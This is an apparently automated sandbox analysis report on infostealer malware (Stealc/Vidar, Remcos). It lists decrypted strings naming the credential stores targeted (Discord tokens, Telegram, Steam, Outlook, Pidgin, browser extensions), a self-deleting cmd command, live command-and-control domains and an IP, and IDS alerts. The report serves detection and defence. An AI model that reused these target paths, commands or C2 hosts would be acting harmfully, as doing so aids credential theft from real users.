Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - HWID:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - OS:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - Architecture:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - UserName:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - Computer Name:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - Local Time:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - UTC:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - Language:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - Keyboards:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - Laptop:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - Running Path:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - CPU:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - Threads:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - Cores:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - RAM:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - Display Resolution:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - GPU:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: User Agents:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Installed Apps:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: All Users:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Current User:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Process List:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: system_info.txt
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: freebl3.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: mozglue.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: msvcp140.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: nss3.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: softokn3.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: vcruntime140.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: \Temp\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: .exe
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: runas
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: open
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: /c start
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: %DESKTOP%
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: %APPDATA%
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: %LOCALAPPDATA%
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: %USERPROFILE%
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: %DOCUMENTS%
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: %PROGRAMFILES%
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: %PROGRAMFILES_86%
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: %RECENT%
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: *.lnk
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: files
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: \discord\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: \Local Storage\leveldb
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: \Telegram Desktop\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: key_datas
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: D877F783D5D3EF8C*
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: map*
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: A7FDF864FBC10B77*
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: F8806DD0C461824F*
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Telegram
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Tox
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: *.tox
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: *.ini
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Password
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: 00000001
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: 00000002
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: 00000003
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: 00000004
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: \Outlook\accounts.txt
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Pidgin
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: \.purple\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: accounts.xml
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: dQw4w9WgXcQ
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: token:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Software\Valve\Steam
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SteamPath
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: \config\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: ssfn*
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: config.vdf
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: DialogConfig.vdf
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: libraryfolders.vdf
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: loginusers.vdf
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: \Steam\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: sqlite3.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: browsers
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: done
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: soft
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: \Discord\tokens.txt
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: https
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: POST
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: HTTP/1.1
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: hwid
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: build
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: token
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: file_name
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: file
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: message
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: screenshot.jpg
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: scriptyprefej.store
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: navygenerayk.store
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: founpiuer.store
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: necklacedmny.store
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: thumbystriw.store
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: fadehairucw.store
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: crisiwarny.store
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: presticitpo.store
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: presticitpo.store
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: - Screen Resoluton:
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: Workgroup: -
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	String decryptor: 4SD0y4--legendaryy

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C69A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C694440 PK11_PrivDecrypt,	0_2_6C694440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C664420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C664420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6944C0 PK11_PubEncrypt,	0_2_6C6944C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C6E25B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C678670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C69A650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C67E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C6BA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C6C0180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6943B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6C6943B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6C6B7C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C677D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6C677D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6C6BBD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6C6B9EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693FF0 PK11_PrivDecryptPKCS1,	0_2_6C693FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6C699840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C693850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BDA40 SEC_PKCS7ContentIsEncrypted,	0_2_6C6BDA40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C7410 NSS_SecureMemcmp,PR_SetError,PK11_Decrypt,	0_2_6C6C7410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C693560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68F050 PR_smprintf,SEC_CertNicknameConflict,strlen,realloc,memset,realloc,strlen,free,PR_smprintf,memcpy,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PR_SetError,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,memcpy,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PR_SetError,PR_SetError,PR_GetCurrentThread,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,PK11_GenerateRandom,SECKEY_DestroyPrivateKey,PR_SetError,free,free,free,free,PK11_FindCertInSlot,PORT_NewArena_Util,free,PK11_ImportCert,PR_SetError,free,CERT_DestroyCertificate,PORT_FreeArena_Util,PR_GetCurrentThread,PORT_ArenaAlloc_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_GetCurrentThread,strlen,PR_SetError,PR_GetCurrentThread,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,PR_SetError,free,SECKEY_DestroyPrivateKey,SECKEY_DestroyEncryptedPrivateKeyInfo,PR_SetError,	0_2_6C68F050

Source: remcos_a.exe, 0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_301b49a1-f

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: remcos_a.exe PID: 7184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 180, type: MEMORYSTR

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49992 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50042 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50080 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2013330037.000000006F8ED000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1669066105.00000000051FB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2013089860.000000006CEF1000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1988015001.000000000079C000.00000040.00000001.01000000.00000003.sdmp, ed55d3f620.exe, 0000001A.00000002.2855529774.0000000005CCC000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2794443992.000000000820B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000003.2576226521.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000002.2629001763.000000000041C000.00000040.00000001.01000000.00000016.sdmp, ed55d3f620.exe, 0000001E.00000002.2908134178.0000000005F1C000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2858928335.000000000831B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000003.2738544511.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000002.2791492042.000000000041C000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1669066105.00000000051FB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2013089860.000000006CEF1000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1988015001.000000000079C000.00000040.00000001.01000000.00000003.sdmp, ed55d3f620.exe, 0000001A.00000002.2855529774.0000000005CCC000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2794443992.000000000820B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000003.2576226521.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000002.2629001763.000000000041C000.00000040.00000001.01000000.00000016.sdmp, ed55d3f620.exe, 0000001E.00000002.2908134178.0000000005F1C000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2858928335.000000000831B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000003.2738544511.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000002.2791492042.000000000041C000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 315ef68721.exe, 0000001F.00000003.2680481772.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, 315ef68721.exe, 0000001F.00000002.2820728591.0000000000F62000.00000040.00000001.01000000.00000017.sdmp, 315ef68721.exe, 00000021.00000002.2868195242.0000000000F62000.00000040.00000001.01000000.00000017.sdmp, 315ef68721.exe, 00000021.00000003.2824289986.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2013330037.000000006F8ED000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr

Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe

Directory queried: number of queries: 1574

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C765070 strlen,PR_SetError,strcpy,_mbsdec,strlen,_mbsinc,_mbsinc,FindFirstFileA,GetLastError,

0_2_6C765070

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49730
